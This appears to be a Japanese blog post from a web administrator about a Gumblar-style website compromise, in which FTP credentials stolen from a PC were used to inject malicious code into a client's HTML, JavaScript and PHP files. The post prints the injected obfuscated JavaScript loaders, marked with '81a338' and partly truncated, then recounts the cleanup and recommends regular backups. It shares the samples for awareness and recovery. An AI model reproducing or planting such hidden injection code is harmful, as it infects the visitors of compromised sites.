WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

ソースコード 感染 スムーズ High Concept Marketing テンプレート エクスチェンジ ブロックポリシー ブラクラ フォローマティック 権利収入 クロスアフィリエイト 関根義光 ざくざく君 エキスパートメール MasterCollection RSS SmoothScroll.js 自動 出店料 RSS Includes Pages 原田真 Agency Business がら空きビジネス 滑らか Login LockDown Yahoo EC もざ 流出 無料 ヤフーショッピング ネットビジネス RMT 宮田麗花 ツイッター CS6 アンダーグラウンドメソッド JavaScript Extension Manager Diamond Affiliate Masters Program サイト改ざん モザイク ping送信 office ランキング アレックス式ネオせどりスクール 画像 個人情報流出 IP SKナレッジ 蝶乃舞 html BUYMA 球体 バイマ 株式会社ニュース ワードプレス 優先順位 Adobe DTD BBIZ せどり 個人情報 タイガーウイング google 切り抜き ヤフー トレンドキーワード twitter 自動化 株式会社Free Agent Style Newpost Catch バックアップ ドメイン followmatic ヤフオク マイクロソフト リンクシェイカー 掲示板 LinkShaker getElementById SEO マルウエア 秒速で1億円稼ぐ男 バナー 株式会社SRシステム ビジネス やしろ塾 小笠原健一 アンダーグラウンドアフィリエイトクラブ 表示 WP 無断送信 株式会社SRシステム 関根塾 @PAGES プラグイン レンタルサーバー ライン エディタ マニュアル CGI 中山秀人 postpost 短縮URL 情報商材 Youtube CS5 プロモーション 上位表示 人物 やしろひろたみ 新井浩 WEB 加工 定型文 IBS ECサイト 副業術 立体 PPC ネットガレージ 北川 雅嗣 トレンドアフィリエイト 固定ページ 音量アイコン ウイルス system ロリポップ 土屋ひろし android エクスプローラー wpXサーバー 登録禁止 XHTML ツール getElementByTagName アフィリエイト ブロック Firefox moza メルマガ配信システム 放射線 .htaccess 池田純矢 与沢翼 レタープレス IE ping レイアウト force puzzle スカイプ アイコン 賢威 伊藤塾 FireWorks functions.php SyntaxHighlighter Windows ボタン 背景 KMSpico インターネットエクスプローラー 復元 株式会社WINGOOD 詐欺組織 サンタ 特定のメールアドレス 脆弱性 久積篤史 インターネット Baidu Tiger-Wing 株式会社A-ブログレス クラウド入力機能 YouTube Maniax 2017 不正アクセス 切抜き wordpress アフィ匠 ソフト 管理画面 レビュー HTML4.0 Line 不正送信 与沢翼×蝶乃舞 インターネットビジネススクール クラウド変換 山下 無料オファー コピーボタン Internet Explorer 管理ツール 申請金ビジネス 村上省吾 アクセスアップ ハート 大園麗花 短縮URLツール テーマ 石井匠 高額塾 グラデーション ライオンアフィリエイト アクセス制限 ネットビジネス大全集 iphone 伊藤 歩 不労所得の神 比較 Ban Hammer ブラウザ パズル タスクバー PHP ウインドウ 詐欺 シャンプー ユーチューブマニアクス2017 加藤 秀吉 伊藤 虎太郎 到達率 インフォトップ ソース wp-login.php Chrome ネオヒルズアカデミー 大園式転売塾 explorer 自己アフィリ Windows 7 DOCTYPE 高速ゲーム ネットゲーム 自己アフィリエイト 配布 改竄 スクロール 日本語入力変換ソフト レイアウト崩れ 特権ビジネス document.all 転売大園塾 プロファイル 81a338 大園転売塾 ライブチャット ネットショップ ブラシ KMS認証 株式会社バンザイ Google Maps クリックランキング Favicon tool セキュリティ 大西良幸 ファビコン ネットビジネス最後の楽園 メモ バイドゥー Google Maps API デスクトップ MovableTYpe 三橋美仁 既得権益 量産 トラフィック 伊藤虎太郎 Wordpress Content Slide ムーバブルタイプ 百度 Thunderbird フレンドシップメール クラック アレックス 改ざん MT ぼかし インペリアルゴールド カスタマイズ FTP Cash on Wordpress スマホ アドセンス css スタイルシート 秀吉塾天下統一 ブルートフォースアタック

アーカイブ

エステトラブル

このページの先頭へ